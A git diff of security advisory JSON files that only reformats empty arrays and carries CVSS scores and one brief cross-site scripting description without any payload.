a/advisories/unreviewed/2024/03/GHSA-rmc6-5r9w-qwpm/GHSA-rmc6-5r9w-qwpm.json b/advisories/unreviewed/2024/03/GHSA-rmc6-5r9w-qwpm/GHSA-rmc6-5r9w-qwpm.json index aea2ec2002a..5da8de61d90 100644 --- a/advisories/unreviewed/2024/03/GHSA-rmc6-5r9w-qwpm/GHSA-rmc6-5r9w-qwpm.json +++ b/advisories/unreviewed/2024/03/GHSA-rmc6-5r9w-qwpm/GHSA-rmc6-5r9w-qwpm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-vhj8-v78c-r8mp/GHSA-vhj8-v78c-r8mp.json b/advisories/unreviewed/2024/03/GHSA-vhj8-v78c-r8mp/GHSA-vhj8-v78c-r8mp.json index 12777bff9dc..e34dc133e22 100644 --- a/advisories/unreviewed/2024/03/GHSA-vhj8-v78c-r8mp/GHSA-vhj8-v78c-r8mp.json +++ b/advisories/unreviewed/2024/03/GHSA-vhj8-v78c-r8mp/GHSA-vhj8-v78c-r8mp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-w3vm-xcfj-p7gr/GHSA-w3vm-xcfj-p7gr.json b/advisories/unreviewed/2024/03/GHSA-w3vm-xcfj-p7gr/GHSA-w3vm-xcfj-p7gr.json index c6fb74b5e0a..0d4afff271a 100644 --- a/advisories/unreviewed/2024/03/GHSA-w3vm-xcfj-p7gr/GHSA-w3vm-xcfj-p7gr.json +++ b/advisories/unreviewed/2024/03/GHSA-w3vm-xcfj-p7gr/GHSA-w3vm-xcfj-p7gr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-w7fr-mc8j-c9f8/GHSA-w7fr-mc8j-c9f8.json b/advisories/unreviewed/2024/03/GHSA-w7fr-mc8j-c9f8/GHSA-w7fr-mc8j-c9f8.json index bff91af1dd3..ce5c316042d 100644 --- a/advisories/unreviewed/2024/03/GHSA-w7fr-mc8j-c9f8/GHSA-w7fr-mc8j-c9f8.json +++ b/advisories/unreviewed/2024/03/GHSA-w7fr-mc8j-c9f8/GHSA-w7fr-mc8j-c9f8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/03/GHSA-w893-jhmx-r3gr/GHSA-w893-jhmx-r3gr.json b/advisories/unreviewed/2024/03/GHSA-w893-jhmx-r3gr/GHSA-w893-jhmx-r3gr.json index 9104758dd28..56865375c44 100644 --- a/advisories/unreviewed/2024/03/GHSA-w893-jhmx-r3gr/GHSA-w893-jhmx-r3gr.json +++ b/advisories/unreviewed/2024/03/GHSA-w893-jhmx-r3gr/GHSA-w893-jhmx-r3gr.json @@ -7,12 +7,8 @@ "CVE-2023-49987" ], "details": "A cross-site scripting (XSS) vulnerability in the component /management/term of School Fees Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the tname parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": null, "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/03/GHSA-x79h-858p-3wf4/GHSA-x79h-858p-3wf4.json b/advisories/unreviewed/2024/03/GHSA-x79h-858p-3wf4/GHSA-x79h-858p-3wf4.json index f6e474c069d..dc137b5f892 100644 --- a/advisories/unreviewed/2024/03/GHSA-x79h-858p-3wf4/GHSA-x79h-858p-3wf4.json +++ b/advisories/unreviewed/2024/03/GHSA-x79h-858p-3wf4/GHSA-x79h-858p-3wf4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-ccmh-gwpx-35xj/GHSA-ccmh-gwpx-35xj.json b/advisories/unreviewed/2024/04/GHSA-ccmh-gwpx-35xj/GHSA-ccmh-gwpx-35xj.json index 68574183eb2..4f812467fe8 100644 --- a/advisories/unreviewed/2024/04/GHSA-ccmh-gwpx-35xj/GHSA-ccmh-gwpx-35xj.json +++ b/advisories/unreviewed/2024/04/GHSA-ccmh-gwpx-35xj/GHSA-ccmh-gwpx-35xj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/04/GHSA-cm2m-f7gc-hv64/GHSA-cm2m-f7gc-hv64.json b/advisories/unreviewed/2024/04/GHSA-cm2m-f7gc-hv64/GHSA-cm2m-f7gc-hv64.json index 63ce03270b1..202adf7ea2c 100644 --- a/advisories/unreviewed/2024/04/GHSA-cm2m-f7gc-hv64/GHSA-cm2m-f7gc-hv64.json +++ b/advisories/unreviewed/2024/04/GHSA-cm2m-f7gc-hv64/GHSA-cm2m-f7gc-hv64.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-2wcp-6fq9-mcr6/GHSA-2wcp-6fq9-mcr6.json b/advisories/unreviewed/2024/05/GHSA-2wcp-6fq9-mcr6/GHSA-2wcp-6fq9-mcr6.json index cc34002f29d..6a8adeda31f 100644 --- a/advisories/unreviewed/2024/05/GHSA-2wcp-6fq9-mcr6/GHSA-2wcp-6fq9-mcr6.json +++ b/advisories/unreviewed/2024/05/GHSA-2wcp-6fq9-mcr6/GHSA-2wcp-6fq9-mcr6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-3gcc-j58h-xmv8/GHSA-3gcc-j58h-xmv8.json b/advisories/unreviewed/2024/05/GHSA-3gcc-j58h-xmv8/GHSA-3gcc-j58h-xmv8.json index 16b59466c25..8d941c5a22a 100644 --- a/advisories/unreviewed/2024/05/GHSA-3gcc-j58h-xmv8/GHSA-3gcc-j58h-xmv8.json +++ b/advisories/unreviewed/2024/05/GHSA-3gcc-j58h-xmv8/GHSA-3gcc-j58h-xmv8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/05/GHSA-fw47-mxv2-w4h2/GHSA-fw47-mxv2-w4h2.json b/advisories/unreviewed/2024/05/GHSA-fw47-mxv2-w4h2/GHSA-fw47-mxv2-w4h2.json index cb4aa788d71..c9ef85ab768 100644 --- a/advisories/unreviewed/2024/05/GHSA-fw47-mxv2-w4h2/GHSA-fw47-mxv2-w4h2.json +++ b/advisories/unreviewed/2024/05/GHSA-fw47-mxv2-w4h2/GHSA-fw47-mxv2-w4h2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -51,9 +49,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/05/GHSA-hx2p-7j74-9v2g/GHSA-hx2p-7j74-9v2g.json b/advisories/unreviewed/2024/05/GHSA-hx2p-7j74-9v2g/GHSA-hx2p-7j74-9v2g.json index d9f83ab59e7..f8a75d9974f 100644 --- a/advisories/unreviewed/2024/05/GHSA-hx2p-7j74-9v2g/GHSA-hx2p-7j74-9v2g.json +++ b/advisories/unreviewed/2024/05/GHSA-hx2p-7j74-9v2g/GHSA-hx2p-7j74-9v2g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-42jx-j5mh-g84j/GHSA-42jx-j5mh-g84j.json b/advisories/unreviewed/2024/06/GHSA-42jx-j5mh-g84j/GHSA-42jx-j5mh-g84j.json index 38075ddc50c..17a32258c89 100644 --- a/advisories/unreviewed/2024/06/GHSA-42jx-j5mh-g84j/GHSA-42jx-j5mh-g84j.json +++ b/advisories/unreviewed/2024/06/GHSA-42jx-j5mh-g84j/GHSA-42jx-j5mh-g84j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-8q7w-vr6v-q7r2/GHSA-8q7w-vr6v-q7r2.json b/advisories/unreviewed/2024/06/GHSA-8q7w-vr6v-q7r2/GHSA-8q7w-vr6v-q7r2.json index 98a57ed57ab..b23bd42e775 100644 --- a/advisories/unreviewed/2024/06/GHSA-8q7w-vr6v-q7r2/GHSA-8q7w-vr6v-q7r2.json +++ b/advisories/unreviewed/2024/06/GHSA-8q7w-vr6v-q7r2/GHSA-8q7w-vr6v-q7r2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-c749-gjwv-9cjp/GHSA-c749-gjwv-9cjp.json b/advisories/unreviewed/2024/06/GHSA-c749-gjwv-9cjp/GHSA-c749-gjwv-9cjp.json index 34208dfdea4..2c9c79ffdb5 100644 --- a/advisories/unreviewed/2024/06/GHSA-c749-gjwv-9cjp/GHSA-c749-gjwv-9cjp.json +++ b/advisories/unreviewed/2024/06/GHSA-c749-gjwv-9cjp/GHSA-c749-gjwv-9cjp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-hqp3-hqc2-v62h/GHSA-hqp3-hqc2-v62h.json b/advisories/unreviewed/2024/06/GHSA-hqp3-hqc2-v62h/GHSA-hqp3-hqc2-v62h.json index 66de05e601a..ffcabb7c384 100644 --- a/advisories/unreviewed/2024/06/GHSA-hqp3-hqc2-v62h/GHSA-hqp3-hqc2-v62h.json +++ b/advisories/unreviewed/2024/06/GHSA-hqp3-hqc2-v62h/GHSA-hqp3-hqc2-v62h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-qf8r-gmh3-q7x2/GHSA-qf8r-gmh3-q7x2.json b/advisories/unreviewed/2024/06/GHSA-qf8r-gmh3-q7x2/GHSA-qf8r-gmh3-q7x2.json index 68d81b12a22..e354fa3a320 100644 --- a/advisories/unreviewed/2024/06/GHSA-qf8r-gmh3-q7x2/GHSA-qf8r-gmh3-q7x2.json +++ b/advisories/unreviewed/2024/06/GHSA-qf8r-gmh3-q7x2/GHSA-qf8r-gmh3-q7x2.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:L/UI:N/VC:H/VI:L/VA:L/SC:H/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-vqhg-cf38-rr8m/GHSA-vqhg-cf38-rr8m.json b/advisories/unreviewed/2024/06/GHSA-vqhg-cf38-rr8m/GHSA-vqhg-cf38-rr8m.json index 9ed28a951fa..a0930c55a13 100644 --- a/advisories/unreviewed/2024/06/GHSA-vqhg-cf38-rr8m/GHSA-vqhg-cf38-rr8m.json +++ b/advisories/unreviewed/2024/06/GHSA-vqhg-cf38-rr8m/GHSA-vqhg-cf38-rr8m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-vxf3-94jj-jhmp/GHSA-vxf3-94jj-jhmp.json b/advisories/unreviewed/2024/06/GHSA-vxf3-94jj-jhmp/GHSA-vxf3-94jj-jhmp.json index 6b662d2d7b1..6067a9fbc9b 100644 --- a/advisories/unreviewed/2024/06/GHSA-vxf3-94jj-jhmp/GHSA-vxf3-94jj-jhmp.json +++ b/advisories/unreviewed/2024/06/GHSA-vxf3-94jj-jhmp/GHSA-vxf3-94jj-jhmp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/06/GHSA-w55c-vqmf-7cp2/GHSA-w55c-vqmf-7cp2.json b/advisories/unreviewed/2024/06/GHSA-w55c-vqmf-7cp2/GHSA-w55c-vqmf-7cp2.json index 77ff530f64f..31e3fcef332 100644 --- a/advisories/unreviewed/2024/06/GHSA-w55c-vqmf-7cp2/GHSA-w55c-vqmf-7cp2.json +++ b/advisories/unreviewed/2024/06/GHSA-w55c-vqmf-7cp2/GHSA-w55c-vqmf-7cp2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/07/GHSA-ccf5-hqv5-p85q/GHSA-ccf5-hqv5-p85q.json b/advisories/unreviewed/2024/07/GHSA-ccf5-hqv5-p85q/GHSA-ccf5-hqv5-p85q.json index 37dd528d838..f92e9438d2d 100644 --- a/advisories/unreviewed/2024/07/GHSA-ccf5-hqv5-p85q/GHSA-ccf5-hqv5-p85q.json +++ b/advisories/unreviewed/2024/07/GHSA-ccf5-hqv5-p85q/GHSA-ccf5-hqv5-p85q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/07/GHSA-qwjr-hp4h-rmwf/GHSA-qwjr-hp4h-rmwf.json b/advisories/unreviewed/2024/07/GHSA-qwjr-hp4h-rmwf/GHSA-qwjr-hp4h-rmwf.json index 334134f01b5..1340aea4a17 100644 --- a/advisories/unreviewed/2024/07/GHSA-qwjr-hp4h-rmwf/GHSA-qwjr-hp4h-rmwf.json +++ b/advisories/unreviewed/2024/07/GHSA-qwjr-hp4h-rmwf/GHSA-qwjr-hp4h-rmwf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/08/GHSA-g335-44rq-mchc/GHSA-g335-44rq-mchc.json b/advisories/unreviewed/2024/08/GHSA-g335-44rq-mchc/GHSA-g335-44rq-mchc.json index 2903d206dbf..aa036bd5cf5 100644 --- a/advisories/unreviewed/2024/08/GHSA-g335-44rq-mchc/GHSA-g335-44rq-mchc.json +++ b/advisories/unreviewed/2024/08/GHSA-g335-44rq-mchc/GHSA-g335-44rq-mchc.json @@ -17,9 +17,7 @@ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-272r-9r62-xgwc/GHSA-272r-9r62-xgwc.json b/advisories/unreviewed/2024/09/GHSA-272r-9r62-xgwc/GHSA-272r-9r62-xgwc.json index c2b30be47d1..0dadd204d65 100644 --- a/advisories/unreviewed/2024/09/GHSA-272r-9r62-xgwc/GHSA-272r-9r62-xgwc.json +++ b/advisories/unreviewed/2024/09/GHSA-272r-9r62-xgwc/GHSA-272r-9r62-xgwc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-27vc-rww5-64v8/GHSA-27vc-rww5-64v8.json b/advisories/unreviewed/2024/09/GHSA-27vc-rww5-64v8/GHSA-27vc-rww5-64v8.json index 43ec8ba363a..24836b934d0 100644 --- a/advisories/unreviewed/2024/09/GHSA-27vc-rww5-64v8/GHSA-27vc-rww5-64v8.json +++ b/advisories/unreviewed/2024/09/GHSA-27vc-rww5-64v8/GHSA-27vc-rww5-64v8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-38j2-mm6q-835r/GHSA-38j2-mm6q-835r.json b/advisories/unreviewed/2024/09/GHSA-38j2-mm6q-835r/GHSA-38j2-mm6q-835r.json index b1f8284a778..40e52e577b1 100644 --- a/advisories/unreviewed/2024/09/GHSA-38j2-mm6q-835r/GHSA-38j2-mm6q-835r.json +++ b/advisories/unreviewed/2024/09/GHSA-38j2-mm6q-835r/GHSA-38j2-mm6q-835r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-39hm-m9hv-pfcr/GHSA-39hm-m9hv-pfcr.json b/advisories/unreviewed/2024/09/GHSA-39hm-m9hv-pfcr/GHSA-39hm-m9hv-pfcr.json index 999f238a9f4..48c8f6f061c 100644 --- a/advisories/unreviewed/2024/09/GHSA-39hm-m9hv-pfcr/GHSA-39hm-m9hv-pfcr.json +++ b/advisories/unreviewed/2024/09/GHSA-39hm-m9hv-pfcr/GHSA-39hm-m9hv-pfcr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-3c83-x7hx-cgfx/GHSA-3c83-x7hx-cgfx.json b/advisories/unreviewed/2024/09/GHSA-3c83-x7hx-cgfx/GHSA-3c83-x7hx-cgfx.json index bb18dc511d6..96b4182e16a 100644 --- a/advisories/unreviewed/2024/09/GHSA-3c83-x7hx-cgfx/GHSA-3c83-x7hx-cgfx.json +++ b/advisories/unreviewed/2024/09/GHSA-3c83-x7hx-cgfx/GHSA-3c83-x7hx-cgfx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-3qq2-g2gc-6wr4/GHSA-3qq2-g2gc-6wr4.json b/advisories/unreviewed/2024/09/GHSA-3qq2-g2gc-6wr4/GHSA-3qq2-g2gc-6wr4.json index c6ee50568f3..c61fb8cc3f2 100644 --- a/advisories/unreviewed/2024/09/GHSA-3qq2-g2gc-6wr4/GHSA-3qq2-g2gc-6wr4.json +++ b/advisories/unreviewed/2024/09/GHSA-3qq2-g2gc-6wr4/GHSA-3qq2-g2gc-6wr4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-3w22-q3jv-89jw/GHSA-3w22-q3jv-89jw.json b/advisories/unreviewed/2024/09/GHSA-3w22-q3jv-89jw/GHSA-3w22-q3jv-89jw.json index 1dad1190368..4bdba91343d 100644 --- a/advisories/unreviewed/2024/09/GHSA-3w22-q3jv-89jw/GHSA-3w22-q3jv-89jw.json +++ b/advisories/unreviewed/2024/09/GHSA-3w22-q3jv-89jw/GHSA-3w22-q3jv-89jw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-3w5w-2v95-54r9/GHSA-3w5w-2v95-54r9.json b/advisories/unreviewed/2024/09/GHSA-3w5w-2v95-54r9/GHSA-3w5w-2v95-54r9.json index ed0f2b28814..1bd234b47c8 100644 --- a/advisories/unreviewed/2024/09/GHSA-3w5w-2v95-54r9/GHSA-3w5w-2v95-54r9.json +++ b/advisories/unreviewed/2024/09/GHSA-3w5w-2v95-54r9/GHSA-3w5w-2v95-54r9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-42qp-w7cq-j4gj/GHSA-42qp-w7cq-j4gj.json b/advisories/unreviewed/2024/09/GHSA-42qp-w7cq-j4gj/GHSA-42qp-w7cq-j4gj.json index fe0bc2fe10c..ec14fd42b3a 100644 --- a/advisories/unreviewed/2024/09/GHSA-42qp-w7cq-j4gj/GHSA-42qp-w7cq-j4gj.json +++ b/advisories/unreviewed/2024/09/GHSA-42qp-w7cq-j4gj/GHSA-42qp-w7cq-j4gj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-45fw-7wjh-qgj9/GHSA-45fw-7wjh-qgj9.json b/advisories/unreviewed/2024/09/GHSA-45fw-7wjh-qgj9/GHSA-45fw-7wjh-qgj9.json index 64750afd247..eed03cd5ae5 100644 --- a/advisories/unreviewed/2024/09/GHSA-45fw-7wjh-qgj9/GHSA-45fw-7wjh-qgj9.json +++ b/advisories/unreviewed/2024/09/GHSA-45fw-7wjh-qgj9/GHSA-45fw-7wjh-qgj9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-47fg-g734-5wff/GHSA-47fg-g734-5wff.json b/advisories/unreviewed/2024/09/GHSA-47fg-g734-5wff/GHSA-47fg-g734-5wff.json index ab26cb468e4..0fabd9f8817 100644 --- a/advisories/unreviewed/2024/09/GHSA-47fg-g734-5wff/GHSA-47fg-g734-5wff.json +++ b/advisories/unreviewed/2024/09/GHSA-47fg-g734-5wff/GHSA-47fg-g734-5wff.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-4hx8-86wp-g993/GHSA-4hx8-86wp-g993.json b/advisories/unreviewed/2024/09/GHSA-4hx8-86wp-g993/GHSA-4hx8-86wp-g993.json index 98ed61902d7..ffed7193221 100644 --- a/advisories/unreviewed/2024/09/GHSA-4hx8-86wp-g993/GHSA-4hx8-86wp-g993.json +++ b/advisories/unreviewed/2024/09/GHSA-4hx8-86wp-g993/GHSA-4hx8-86wp-g993.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-4m5g-9h9q-7x5h/GHSA-4m5g-9h9q-7x5h.json b/advisories/unreviewed/2024/09/GHSA-4m5g-9h9q-7x5h/GHSA-4m5g-9h9q-7x5h.json index fefe5c9b5d6..3c17f3df6f8 100644 --- a/advisories/unreviewed/2024/09/GHSA-4m5g-9h9q-7x5h/GHSA-4m5g-9h9q-7x5h.json +++ b/advisories/unreviewed/2024/09/GHSA-4m5g-9h9q-7x5h/GHSA-4m5g-9h9q-7x5h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-57jv-pfhx-pfm5/GHSA-57jv-pfhx-pfm5.json b/advisories/unreviewed/2024/09/GHSA-57jv-pfhx-pfm5/GHSA-57jv-pfhx-pfm5.json index d3b3f99871a..2c0f089bc9d 100644 --- a/advisories/unreviewed/2024/09/GHSA-57jv-pfhx-pfm5/GHSA-57jv-pfhx-pfm5.json +++ b/advisories/unreviewed/2024/09/GHSA-57jv-pfhx-pfm5/GHSA-57jv-pfhx-pfm5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-5rxq-m67m-h24r/GHSA-5rxq-m67m-h24r.json b/advisories/unreviewed/2024/09/GHSA-5rxq-m67m-h24r/GHSA-5rxq-m67m-h24r.json index 6fdf14eddb8..6677f50a2d1 100644 --- a/advisories/unreviewed/2024/09/GHSA-5rxq-m67m-h24r/GHSA-5rxq-m67m-h24r.json +++ b/advisories/unreviewed/2024/09/GHSA-5rxq-m67m-h24r/GHSA-5rxq-m67m-h24r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-67cr-pq3q-pqwx/GHSA-67cr-pq3q-pqwx.json b/advisories/unreviewed/2024/09/GHSA-67cr-pq3q-pqwx/GHSA-67cr-pq3q-pqwx.json index 6fb1c16e0e2..686bac85336 100644 --- a/advisories/unreviewed/2024/09/GHSA-67cr-pq3q-pqwx/GHSA-67cr-pq3q-pqwx.json +++ b/advisories/unreviewed/2024/09/GHSA-67cr-pq3q-pqwx/GHSA-67cr-pq3q-pqwx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-6879-gf6q-3qmj/GHSA-6879-gf6q-3qmj.json 